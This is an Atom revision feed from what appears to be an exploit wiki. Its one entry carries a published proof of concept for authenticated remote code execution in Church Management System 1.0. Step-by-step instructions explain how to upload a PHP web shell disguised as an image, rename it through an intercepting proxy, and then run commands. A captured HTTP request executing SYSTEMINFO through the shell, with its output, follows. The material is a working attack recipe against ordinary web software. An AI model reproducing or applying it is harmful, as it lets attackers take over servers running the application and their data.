<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Church_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Church Management System 1.0 任意文件上傳&amp;遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Church_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Church_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T09:16:25Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Church_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6421&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@bu...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Church_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6421&amp;oldid=prev"/>
		<updated>2021-07-06T01:01:19Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@bu...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)&lt;br /&gt;
# Date: 07/03/2021&lt;br /&gt;
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: Windows 10&lt;br /&gt;
# CVE : N/A&lt;br /&gt;
&lt;br /&gt;
# Proof of Concept :&lt;br /&gt;
&lt;br /&gt;
1- Login any user account and change profile picture.&lt;br /&gt;
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)&lt;br /&gt;
3- Before uploading your file, intercept your traffic by using any proxy.&lt;br /&gt;
4- Change test.php.jpg file to test.php and click forward.&lt;br /&gt;
5- Find your test.php file path and try any command.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
###################### REQUEST ##########################################&lt;br /&gt;
&lt;br /&gt;
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0&lt;br /&gt;
Accept: image/webp,*/*&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://localhost/cman/members/dashboard.php&lt;br /&gt;
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc&lt;br /&gt;
&lt;br /&gt;
####################### RESPONSE #########################################&lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Sat, 03 Jul 2021 11:28:16 GMT&lt;br /&gt;
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3&lt;br /&gt;
X-Powered-By: PHP/8.0.3&lt;br /&gt;
Content-Length: 4410&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=UTF-8&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Host Name:                 MRT&lt;br /&gt;
OS Name:                   Microsoft Windows 10 Pro&lt;br /&gt;
OS Version:                10.0.19043 N/A Build 19043&lt;br /&gt;
OS Manufacturer:           Microsoft Corporation&lt;br /&gt;
OS Configuration:          Standalone Workstation&lt;br /&gt;
OS Build Type:             Multiprocessor Free&lt;br /&gt;
Registered Owner:          Murat  &lt;br /&gt;
System Boot Time:          6/25/2021, 2:51:40 PM&lt;br /&gt;
System Manufacturer:       Dell Inc.&lt;br /&gt;
System Type:               x64-based PC&lt;br /&gt;
Processor(s):              1 Processor(s) Installed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
############################################################################&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>